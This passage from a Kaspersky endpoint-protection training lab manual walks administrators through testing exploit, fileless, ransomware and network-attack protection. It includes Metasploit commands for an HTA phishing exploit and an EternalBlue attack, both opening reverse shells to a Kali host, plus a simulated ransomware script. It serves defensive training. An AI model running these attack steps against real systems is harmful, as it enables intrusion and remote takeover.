The task is performed on Tom-Laptop. The DC, Security-Center, Alex-Desktop, and Kali machines must be powered on. 1. Exit Kaspersky Endpoint Security: Right-click its icon in the notification area and on the shortcut menu, select Exit Switch to the Kali computer. 2. Log on to the root account. Password—Ka5per5Ky 3. Open a Terminal window 4. Start the Metasploit Framework console. Carry out the following command: msfconsole 5. Select the exploit template. Carry out the following command: use exploit/windows/misc/hta_server You can use the TAB key to autocomplete commands 6. Display the list of applications vulnerable to this exploit. Carry out the following command: show targets L–52 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 7. Select to attack PowerShell x64. Carry out the following command: set target 1 8. Specify the malicious payload. Carry out set PAYLOAD windows/x64/meterpreter/reverse_tcp 9. Specify the address of the listening server (address of the Kali computer). Carry out the following command: set LHOST 10.28.0.50 10. Activate the exploit. Carry out exploit -j 11. Copy the link (right-click, Copy Link) http://10.28.0.50:8080/<name of the generated file>.hta from the Terminal to the clipboard 12. Open a new terminal instance 13. Start Mozilla Thunderbird. In the terminal, type thunderbird 14. Create a new message: — Specify the addressee. In the To: box, type Tom@abc.lab — In the Subject: box, type Report — Paste the link from the clipboard (http://10.28.0.50/<name of the generated file>.hta) to the message body 15. Click Send to dispatch the message http://10.28.0.50:8080/%3Cname%20of%20the%20generated%20file%3E.hta L–53 Lab 8. How to check health of Exploit Prevention Switch to Tom-Laptop. 16. Open Microsoft Outlook 17. Select the received message 18. Open the link from the message in a browser 19. Save the file to the computer 20. In the warning window, click Run Switch to the Kali computer. 21. 
Open the Metasploit Framework console. 22. Make sure that a new session has been opened 23. Connect to the created session. Carry out the following command: sessions 1 where 1 is the number of the recently created session 24. You have got full remote access to the Tom-Laptop machine 25. Run Command Prompt. Carry out the following command: shell Then you can carry out the whoami command to get the name of the active user whoami L–54 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 Task B: Disable most of the protection components In this task, you will disable most of the Kaspersky Endpoint Security protection components. The task is performed on Security-Center. The DC, Alex-Desktop, and Tom-Laptop machines must be powered on. 26. Open Kaspersky Security Center Web Console 27. Go to Devices | Policies & Profiles 28. Open the policy Kaspersky Endpoint Security for Windows (11.1.0) 29. Switch to the Application Settings tab 30. Disable the following protection components: – KSN – Behavior Detection 31. Switch to Essential Threat Protection 32. Disable the following protection components: – File Threat Protection – Web Threat Protection – Mail Threat Protection 33. Click Save to save the policy settings. Confirm that you want to use the specified settings: Click Yes 34. Wait for the policy to be applied L–55 Lab 8. How to check health of Exploit Prevention Task C: Test protection against exploits In this task, you will enable the Exploit Prevention component and test it. The task is performed on Tom-Laptop. The DC, Kali, Alex-Desktop, and Tom-Laptop machines must be powered on. 35. Close the web browser window 36. !Restart the Tom-Laptop computer 37. Log on to the system 38. Open the main window of Kaspersky Endpoint Security 39. Click in the Protection components area 40. Make sure that the Exploit Prevention component is enabled 41. Go to the Downloads directory 42. Run the *.hta file 43. 
Note that a script run error has occurred 44. In the Script Error window, click No L–56 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 45. Open Kaspersky Endpoint Security reports 46. Switch to the report of the Exploit Prevention component 47. Make sure that the exploit was detected Switch to the Kali computer. 48. Log on to the root account. Password—Ka5per5Ky 49. Open the Metasploit console 50. Carry out the following command: sessions 51. Note that there are no active sessions on the criminal’s computer Conclusion In this lab, we made sure that the multitier defense system of Kaspersky Endpoint Security permits repelling advanced threats even when the main protection components are disabled. Lab 9. How to test protection against fileless threats Scenario. Recently, a new threat vector has become popular, which uses PowerShell, a powerful operating system administration and management tool. Criminals can run their code in the address space of the PowerShell process. A fileless attack is hard to detect since malicious code is executed in the memory, unlike an ordinary virus that stores its files on the local drive. Typically, attacks via PowerShell are performed after the machine has been compromised using other malicious actions, usually, exploitation of software vulnerabilities. Contents. In this lab, we will disable KSN and test how antimalware scan interface (AMSI) detects fileless threats. L–57 Lab 9. How to test protection against fileless threats Make sure that AMSI detects fileless threats The task is performed on Tom-Laptop. The DC, Security-Center, and Alex-Desktop machines must be powered on. 1. Open c:\temp 2. Unpack the bsstest_amsi archive 3. Enter the password infected 4. Press WIN+R 5. Type powershell 6. Click OK 7. Go to the directory of the unpacked script. Carry out cd c:\temp\bsstest_amsi\bsstest_amsi 8. Run the test PowerShell script. Carry out the following command: .\bsstest_amsi.ps1 9. 
Make sure that Kaspersky Endpoint Security blocks the script L–58 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 10. Open Kaspersky Endpoint Security reports 11. Select AMSI Protection Provider 12. Make sure that Kaspersky Endpoint Security has detected and neutralized the threat Conclusion You’ve made sure that even if some of the protection components are disabled, Kaspersky Endpoint Security can efficiently interact with the script interpreters built into Microsoft Windows operating systems to detect and block malicious code. Lab 10. Improve workstations’ protection against ransomware Scenario. Your network computers are protected with Kaspersky Endpoint Security and managed via Kaspersky Security Center. Of all threats, you are most concerned about crypto ransomware. If Kaspersky Endpoint Security fails to detect a new malware version one day, the company will lose much money. To decrease the risk, configure Host Intrusion Prevention to prohibit all programs except for trusted from editing documents on the computers. Contents. In this lab, we will: 1. Simulate a ransomware infection 2. Prohibit all programs except for trusted from editing and deleting documents 3. Configure Host Intrusion Prevention events to be stored on the Administration Server 4. Simulate encrypting a document and check the result Task A: Simulate a ransomware infection Find the ransomware.bat script on the desktop of the Tom-Laptop computer and run it. It is designed to encrypt text documents and delete the original files. L–59 Lab 10. Improve workstations’ protection against ransomware The task is performed on Tom-Laptop. The DC, Security-Center, and Alex-Desktop machines must be powered on. 1. Find the ransomware.bat and invoice.txt files on the desktop 2. Run the ransomware.bat file 3. Make sure that the invoice.txt file has gone, and the invoice.txt.aes file has appeared instead 4. Open the invoice.txt.aes file in Notepad 5. 
Make sure that the invoice.txt.aes file is encrypted 6. Close Notepad Task B: Prohibit all programs except for trusted from editing and deleting documents Open the Host Intrusion Prevention settings in the Kaspersky Endpoint Security policy. Find the list of protected resources. Create a Documents category. Add files with the *.txt extension to it. Prohibit all programs except for trusted from editing, deleting, and creating files of this category. The task is performed on Security-Center. The DC, Tom-Laptop, and Alex-Desktop machines must be powered on. 7. Open Kaspersky Security Center Web Console 8. Go to Devices | Policies & Profiles 9. Open the policy Kaspersky Endpoint Security for Windows (11.1.0) 10. Switch to the Application settings tab 11. In Advanced Threat Protection, select Host Intrusion Prevention L–60 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 12. Enable Host Intrusion Prevention 13. To open the list of rights, click the link Application rights and protected resources 14. To create a new category, in the left pane, click Add 15. Select Category of protected resources 16. Type Protected Files for the category name 17. Click the Operating system link 18. Select the Personal data subcategory 19. Click OK twice L–61 Lab 10. Improve workstations’ protection against ransomware 20. To create a subcategory, in the left pane, click Add 21. Select Category of protected resources 22. Specify Documents for the name 23. Click the Operating system link 24. Specify the Protected Files subcategory 25. Click OK twice 26. Add file types to the category. In the left pane, click Add L–62 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 27. For the resource type, select File or folder 28. In the Path box, enter *.txt, and in the Display name field, type txt 29. Click the Operating system link 30. Specify the Documents subcategory 31. Click OK twice 32. 
Specify rights for the created category: Select the category Personal data | Protected files | Documents | *.txt 33. Click the *.txt row 34. Prohibit applications that have Low and High Restricted reputation from editing the files belonging to this category: Change the action for Write, Delete, and Create operations to Block 35. Configure Host Intrusion Prevention to log attempts to edit documents. Enable Log events for the Write, Delete, and Create actions 36. Click OK twice to save the access rights 37. Click Save to save the policy 38. Wait for the policy to be enforced L–63 Lab 10. Improve workstations’ protection against ransomware Task C: Configure Host Intrusion Prevention events to be stored on the Administration Server Open event settings in the policy. Find information events of Host Intrusion Prevention: Application placed in restricted group and Application privilege control rule triggered. Configure the policy to store these events on the Administration Server. The task is performed on Security-Center. The DC, Tom-Laptop, and Alex-Desktop machines must be powered on. 39. Open Kaspersky Security Center MMC Console 40. Open the Kaspersky Endpoint Security for Windows policy 41. Switch to the Event configuration section and open the Info tab 42. Click the Event type header to sort the list alphabetically and select the event Application placed in restricted group 43. Open the event’s properties: Click the Properties button below the list L–64 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 44. Configure storing the event in the Administration Server database: Select On Administration Server for (days) and click OK 45. Select the event Host Intrusion Prevention was triggered and click Properties 46. Configure storing the event in the Administration Server database: Select On Administration Server for (days) and click OK 47. Click Save to save the policy 48. Wait for the policy to be enforced L–65 Lab 10. 
Improve workstations’ protection against ransomware 49. Open the web console 50. Switch to the Monitoring & Reporting | Event Selections tab 51. To create a new event selection, click Add 52. Type Host Intrusion Prevention events for the selection name 53. Switch to the Events section 54. In the Application name list, select Kaspersky Endpoint Security 55. Select the Severity Level Info 56. Select the Include general events check box 57. On the list of events, select — Application placed in restricted group — Host Intrusion Prevention was triggered 58. Click Save L–66 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 Task D: Simulate encrypting a document and check the result Find the ransomware.bat script on the desktop of the Alex-Desktop computer and run it. It is designed to encrypt text documents and delete the original files. Make sure that the script cannot delete the text file this time. Consult the Host Intrusion Prevention events on the Administration Server. Make sure that it was Host Intrusion Prevention that did not allow the script to delete the text document. The task is performed on Alex-Desktop. The DC, Tom-Laptop, and Security-Center machines must be powered on. 59. Find the ransomware.bat and invoice.txt files on the desktop 60. Run the ransomware.bat file 61. Make sure that the invoice.txt.aes file has appeared on the desktop, but the invoice.txt file has not been deleted 62. Switch to the Security- Center computer 63. Open Kaspersky Security Center Web Console 64. Switch to the Monitoring & Reporting | Event Selections tab 65. Tick the Host intrusion prevention events selection 66. Click Start to display the event selection 67. Study the events in the selection. Make sure that it was Host Intrusion Prevention that did not allow the program to delete the document Conclusion You have configured Host Intrusion Prevention to allow only trusted programs to edit text documents. 
To properly protect against ransomware, add more document types to the category: *.doc, *.docx, *.xlsx, etc. Programs by known vendors, such as Microsoft Office, are trusted, and Host Intrusion Prevention will not restrict them. Ransomware, even new that has not yet been added to the signature database or KSN, will never get in the trusted category and will not be able to edit documents. L–67 Lab 11. How to test Network Threat Protection Lab 11. How to test Network Threat Protection Scenario. Your network computers are protected with Kaspersky Endpoint Security and managed via Kaspersky Security Center. You scan your network periodically with a special security scanner to find out whether the computers are properly shielded. Kaspersky Endpoint Security blocks attacks on the scanned computers and then blocks any connections from the attacking computer for an hour. Add the computer from which you perform vulnerability scanning to the list of exclusions. Contents. In this lab, we will: 1. Imitate a network attack from Kali on Alex-Desktop 2. Study the Network attack report 3. Unblock the Kali computer 4. Configure the Network Threat Protection not to block Kali 5. Imitate an attack from Kali on Alex-Desktop and study the results Task A: Imitate a network attack from Kali on Alex-Desktop On the Kali computer, run the Metasploit Framework penetration utility. Perform an Eternalblue attack. EternalBlue exploits a vulnerability in Server Message Block (SMB) v1 protocol. A criminal can generate a specially prepared package, transfer it to a remote computer, thus get remote access to the system, and run any code there. The task is performed on Kali. The DC, Security-Center, and Alex-Desktop machines must be powered on. 1. Log on to the root account. Password—Ka5per5Ky 2. Run the terminal 3. Start the Metasploit Framework console. Carry out the following command: msfconsole 4. Select the exploit template. 
   Carry out the following command:
   use exploit/windows/smb/ms17_010_eternalblue
5. Specify the payload. Carry out the following command:
   set payload generic/shell_reverse_tcp
6. Specify the address of the listening host (the address of the Kali computer). Carry out the following command:
   set LHOST 10.28.0.50
7. Specify the address of the victim machine. Carry out the following command:
   set RHOST 10.28.0.100
8. Launch the exploit. Carry out the following command:
   exploit
   Note that you cannot exploit the vulnerability. The attack fails because Kaspersky Endpoint Security blocks network attacks by default. The attacking address is also blocked for an hour, so any further connections from Kali to Alex-Desktop will fail until you unblock it (Task C) or the hour passes.

Task B: Study the Network attack report

Find the list of reports in the Web Console. Create a new template for the Network attack report. Generate the report, consult the details of the network attack, and find the addresses of the attacking and attacked machines.

The task is performed on Security-Center. The DC, Tom-Laptop, and Alex-Desktop machines must be powered on.

9. Open Kaspersky Security Center Web Console.
10. Switch to the Monitoring & Reporting | Reports tab.
11. Click Add.
12. Name the report Network attack report.
13. Under Statistics of threats, select Report on network attacks.
14. Click Next.
15. Click Next.
16. Select to include information for the last 30 days.
17. Click OK.
18. In the message box, click Save and run.
19. Switch to the Details tab.
20. Find the IP address of the attacking computer and the DNS name of the attacked machine in the report.
21. Close the report.
22. Switch to the Event Selections tab.
23. Click Add to create a new event selection.
24. Name the selection Network attacks.
25. Switch to the Events section.
26. In the Application name field, select Kaspersky Endpoint Security for Windows.
27.
For the Severity level, choose Critical.
28. Select the Include general events check box.
29. On the list of events, find and select the Network attack detected event.
30. Click Save to save the event selection.
31. In the message box, tick Go to selection result and click Save.
32. Study the events in the selection.

Task C: Unblock the Kali computer

Open Kaspersky Endpoint Security on the attacked computer. Use the shortcut menu of the Firewall component to open Network Monitor. Find the list of blocked computers and unblock the Kali computer.

The task is performed on Alex-Desktop. The DC, Security-Center, Tom-Laptop, and Kali machines must be powered on.

33. Open the Kaspersky Endpoint Security interface: click its icon in the notification area.
34. Click in the Protection components area.
35. At the bottom of the window, click Network Monitor.
36. The Network Monitor window opens.
37. Switch to the Blocked computers tab.
38. Unblock the Kali computer: select the address 10.28.0.50 and click Unblock.
39. Close all Kaspersky Endpoint Security windows.

Task D: Configure exclusions in the properties of Network Threat Protection

In the Kaspersky Endpoint Security policy, open the Network Threat Protection settings. Find the list of trusted computers and add the IP address of the Kali computer (10.28.0.50) to it.

The task is performed on Security-Center. The DC, Kali, Alex-Desktop, and Tom-Laptop machines must be powered on.

40. Open Kaspersky Security Center Web Console.
41. Go to Devices | Policies & Profiles.
42. Open the policy Kaspersky Endpoint Security for Windows (11.1.0).
43. Switch to the Application Settings tab.
44. Open the Essential Threat Protection section.
45. Click the Network Threat Protection link.
46.
Open the list of trusted computers: click the Exclusions link.
47. Click Add to specify a device.
48. Type the IP address of the Kali computer, 10.28.0.50, and click OK.
49. Click OK.
50. Click Save to save the policy.
51. Wait for the policy to be enforced on Alex-Desktop.

Task E: Imitate an attack from Kali on Alex-Desktop and study the results

Simulate another attack on Alex-Desktop from Kali using Metasploit Framework. Make sure that Kaspersky Endpoint Security no longer reacts to this attack.

The task is performed on Kali. The DC, Security-Center, Alex-Desktop, and Tom-Laptop machines must be powered on.

52. Log on to the root account. Password: Ka5per5Ky
53. Open a Terminal window.
54. Launch the exploit again. Carry out the following command in the Metasploit console (if you closed msfconsole after Task A, start it again and repeat the use and set commands from steps 4–7 first):
   exploit
55. Make sure that you have exploited the vulnerability in the SMB protocol: a command shell on Alex-Desktop opens in the terminal.
56. Display the list of directories in that shell. Carry out the following command:
   dir

Conclusion

You have configured Network Threat Protection not to react to attacks from the specified IP address. You can use this method to exclude the addresses of network security scanners. Keep in mind what the exclusion means: as Task E shows, a genuine attack from an excluded address is not blocked at all, so exclude only dedicated scanner hosts with fixed addresses, keep the list short, and treat the exclusion as a complement to patching the endpoints (here, MS17-010), not as a substitute for it.

Also, you have created a new report and a new event selection. There are many types of reports in Kaspersky Security Center. If the pre-configured reports available on the Reports tab are insufficient, have a look at the complete list of reports that you can create. If none of them meets your needs, create a selection of the events that interest you and configure its conditions: event types, time, group of computers, etc.

Lab 12. How to configure exclusions from self-defense

Scenario. Your network computers are protected with Kaspersky Endpoint Security and managed via Kaspersky Security Center. To help employees remotely, you connect to their machines through Windows Remote Assistance.
However, Kaspersky Endpoint Security self-defense blocks external control of its interface, so the product does not react to your actions in a Windows Remote Assistance session. Make an exclusion for Windows Remote Assistance to be able to manage Kaspersky Endpoint Security remotely.

Contents. In this lab, we will:
1. Try to interact with Kaspersky Endpoint Security via Windows Remote Assistance
2. Allow Windows Remote Assistance to interact with Kaspersky Endpoint Security
3. Open the local report of Kaspersky Endpoint Security in a Windows Remote Assistance session

Task A: Try to interact with Kaspersky Endpoint Security via Windows Remote Assistance

Run Windows Remote Assistance on Alex-Desktop and remember the ID and password. Run Windows Remote Assistance on Tom-Laptop and connect to Alex-Desktop. Open the Kaspersky Endpoint Security interface and try to open the Reports window.

The task is performed on Alex-Desktop at first. The DC, Security-Center, and Tom-Laptop machines must be powered on.

1. Run Outlook.
2. Press WIN+R.
3. Type msra in the field.
4. Click OK.
5. Select the option Invite someone you trust to help you.
6. Select Use e-mail to send an invitation.
7. Specify the addressee. In the To: box, type tom@abc.lab
8. Click Send.
9. Write down the remote connection password.

Switch to Tom-Laptop.
10. Log on to the abc\Tom account. Password: Ka5per5Ky
11. Run Outlook.
12. In the Inbox, open the message from Alex@abc.lab.
13. Click the attached file Invitation.*
14. Click Open.
15. Type the remote connection password (see step 9).

Switch to the Alex-Desktop machine.
16. Allow Tom to connect to your workstation. In the window that opens, click Yes.

Switch to Tom-Laptop.
17.
Click Request control in the upper-left corner of the window.

Switch to the Alex-Desktop machine.
18. Allow Tom to manage your workstation. In the window that opens, click Yes.

Switch to Tom-Laptop.
19. Open the Kaspersky Endpoint Security interface.
20. Make sure that you cannot manage Kaspersky Endpoint Security remotely: the interface does not respond to your actions in the Remote Assistance session.

Task B: Allow Windows Remote Assistance to interact with Kaspersky Endpoint Security

Open the Kaspersky Endpoint Security policy. Find the list of trusted applications and add the msra.exe file to it, allowing it to interact with the Kaspersky Endpoint Security interface. Keep in mind that this exclusion weakens self-defense for that process: any Remote Assistance session that gains control of the desktop can then drive the product interface, so trust only the system msra.exe and only on computers where remote support is actually needed.

The task is performed on Security-Center. The DC, Alex-Desktop, and Tom-Laptop machines must be powered on.

21. Open Kaspersky Security Center Web Console.
22. Go to Devices | Policies & Profiles.
23. Open the policy Kaspersky Endpoint Security for Windows (11.1.0).
24. Switch to the Application Settings tab.
25. Open the General Settings section.
26. Open the list of exclusions: click the Exclusions link.
27. To add a trusted application, click the Trusted applications link in the lower-left corner of the window.
28. To specify the service process of Microsoft Remote Assistance, click